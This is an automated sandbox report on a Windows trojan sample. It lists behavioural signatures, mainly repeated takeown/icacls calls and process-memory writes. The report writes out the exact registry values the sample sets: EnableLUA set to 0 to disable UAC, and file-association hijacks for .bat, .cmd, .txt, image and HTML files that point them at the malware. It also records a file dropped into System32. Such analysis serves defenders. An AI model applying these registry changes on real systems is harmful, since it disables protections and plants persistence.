Malware Analysis Report

2024-12-07 14:56

Sample ID 241002-3zce6axdne
Target 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN
SHA256 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
Tags
defense_evasion discovery evasion exploit persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f

Threat Level: Known bad

The file 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence trojan

UAC bypass

Disables Task Manager via registry modification

Possible privilege escalation attempt

Checks computer location settings

Modifies system executable filetype association

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-02 23:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-02 23:56

Reported

2024-10-02 23:59

Platform

win7-20240903-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\tzsync.exe C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
File opened for modification C:\Windows\System32\tzsync.exe C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2060 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 2060 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 2060 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 2060 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 2060 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 2060 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 2060 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
